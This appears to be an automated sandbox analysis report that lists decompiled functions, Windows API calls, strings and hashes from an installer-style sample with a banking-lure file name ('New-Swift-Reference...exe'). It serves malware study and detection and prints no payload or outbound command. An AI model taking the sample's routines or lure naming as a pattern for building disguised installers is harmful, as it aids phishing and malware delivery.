Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED), ref: 004055C4
Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624

Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB

Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2

Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: 0565585741ff3a54c4db3f9c84488b230b3a83c5e1087797c690e03fca88cb62
Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
Opcode Fuzzy Hash: 0565585741ff3a54c4db3f9c84488b230b3a83c5e1087797c690e03fca88cb62
Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 004049A3
SetWindowTextW.USER32(00000000,?), ref: 004049CD
SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
CoTaskMemFree.OLE32(00000000), ref: 00404A89
lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9

Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E

Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7

Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD

Strings

: Completed, xrefs: 00404AB5, 00404ABA, 00404AC5
C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne, xrefs: 00404AA4
A, xrefs: 00404A77

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\medlemskartotek\vejmaterialerne
API String ID: 2624150263-3229615022
Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404EE8
GetDlgItem.USER32(?,00000408), ref: 00404EF3
GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
DeleteObject.GDI32(00000000), ref: 00404FCA
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC

Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6

SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
GetWindowLongW.USER32(?,000000F0), ref: 0040510E
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
ShowWindow.USER32(?,00000005), ref: 0040512C
SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
ImageList_Destroy.COMCTL32(?), ref: 004052FA
GlobalFree.KERNEL32(?), ref: 0040530A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
ShowWindow.USER32(?,00000000), ref: 004054B4
GetDlgItem.USER32(?,000003FE), ref: 004054BF
ShowWindow.USER32(00000000), ref: 004054C6

Strings

M, xrefs: 00405084
, xrefs: 0040549E
N, xrefs: 00405165

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
GetDlgItem.USER32(?,000003E8), ref: 004046D4
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
GetSysColor.USER32(?), ref: 00404702
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
lstrlenW.KERNEL32(?), ref: 00404723
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
GetDlgItem.USER32(?,0000040A), ref: 0040479E
SendMessageW.USER32(00000000), ref: 004047A5
GetDlgItem.USER32(?,000003E8), ref: 004047D0
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
LoadCursorW.USER32(00000000,00007F02), ref: 00404821
SetCursor.USER32(00000000), ref: 00404824
LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
SetCursor.USER32(00000000), ref: 00404840
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881

Strings

: Completed, xrefs: 004047FF
N, xrefs: 004047BE

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: : Completed$N
API String ID: 3103080414-2140067464
Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction ID: bd26b540472948519bfd0c296b0258925a36bd111cdc3ec084d9598cfd27fd02
Opcode Fuzzy Hash: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
Instruction Fuzzy Hash: A16180B1900209FFDB10AF61DD85AAA7B69FB84314F00853AFA05B62D1C7789D61CF99

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429220,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction ID: ce1ac2179a7edcd12a9bbec6f3b07c603adbad34dac6b1105353c89659c02e28
Opcode Fuzzy Hash: 0581a76dac59d14a304b59f1a22efed427390318551c262ebfc8c4fa99717288
Instruction Fuzzy Hash: 63417B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0CB74DA55DFA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040614D Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004062E8,?,?), ref: 00406188
GetShortPathNameW.KERNEL32(?,00426DA8,00000400), ref: 00406191

Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F6C
Part of subcall function 00405F5C: lstrlenA.KERNEL32(00000000,?,00000000,00406241,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F9E

GetShortPathNameW.KERNEL32(?,004275A8,00000400), ref: 004061AE
wsprintfA.USER32 ref: 004061CC
GetFileSize.KERNEL32(00000000,00000000,004275A8,C0000000,00000004,004275A8,?,?,?,?,?), ref: 00406207
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406216
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 0040624E
SetFilePointer.KERNEL32(0040A580,00000000,00000000,00000000,00000000,004269A8,00000000,-0000000A,0040A580,00000000,[Rename],00000000,00000000,00000000), ref: 004062A4
GlobalFree.KERNEL32(00000000), ref: 004062B5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004062BC

Part of subcall function 00405FF7: GetFileAttributesW.KERNELBASE(00000003,004030BD,C:\Users\user\Desktop\New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.exe,80000000,00000003,?,?,?,?,?,00403847,?), ref: 00405FFB
Part of subcall function 00405FF7: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,?,?,00403847,?), ref: 0040601D

Strings

[Rename], xrefs: 00406236, 00406248
%ls=%ls, xrefs: 004061C2

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
Instruction ID: ee14a5085299e91e75cde0480e6b7733258fb9cdf367bc6c01a907801337673b
Opcode Fuzzy Hash: dc4682ef79e092581efd41d4f88914fec7f2984e6363dc945e8c6098decd7ff7
Instruction Fuzzy Hash: 03312130201715BFD2207B619D48F2B3AACEF41718F16007EBD42F62C2DE3C982586AD

Uniqueness

Uniqueness Score: -1.00%

Function 004044CA Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004044E7
GetSysColor.USER32(00000000), ref: 00404525
SetTextColor.GDI32(?,00000000), ref: 00404531
SetBkMode.GDI32(?,?), ref: 0040453D
GetSysColor.USER32(?), ref: 00404550
SetBkColor.GDI32(?,?), ref: 00404560
DeleteObject.GDI32(?), ref: 0040457A
CreateBrushIndirect.GDI32(?), ref: 00404584

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction ID: 38e33b6b7dbb33234eb72a45dbf2bae34717d2ad5d3f2d744b20a042554d00e7
Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
Instruction Fuzzy Hash: 072133B1500704BBCB319F68DD08B5BBBF8AF45714F04896EEB96A26E1D734E904CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004026EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(?,?,?,?), ref: 00402758
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC

Part of subcall function 004060D8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 004060EE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878

Strings

9, xrefs: 0040273B

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction ID: 3c27e7501abded1006c2f30e54a373b5f9dac3b1129e645fb880415469f2e5e7
Opcode Fuzzy Hash: 236766759de96d2d3aaf4f5caab781f4252851e9d444e3fd407b0b900c44e253
Instruction Fuzzy Hash: 2351FA75D00219AADF20DF95CA89AAEBB79FF04304F10817BE541B62D0D7B49D82CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040678E Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818

Strings

*?|<>/":, xrefs: 004067E0
C:\Users\user\AppData\Local\Temp\, xrefs: 0040678F

Memory Dump Source

Source File: 00000000.00000002.1709313418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1709302698.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709324473.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709335399.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1709486020.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_New-Swift-Reference-BWT2810173-ALL ROUND TT YEH271863.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4010320282
Opcode ID: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction ID: 0f69a0116b7f1ba106e871a719c63b07a343e19011b313dcb24ddb0bfcf4baff
Opcode Fuzzy Hash: 7f8a10c6574f84f045d99a2f2ba91d71661da1c9dbe2055a6f375f6d39957bd5
Instruction Fuzzy Hash: CE11862A80161299D7303B149D40A7762FCEF98764F56843FE986732C0E77C4CD286BD

Uniqueness

Uniqueness Score: -1.00%

Function 00404E1E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404E39
GetMessagePos.USER32 ref: 00404E41
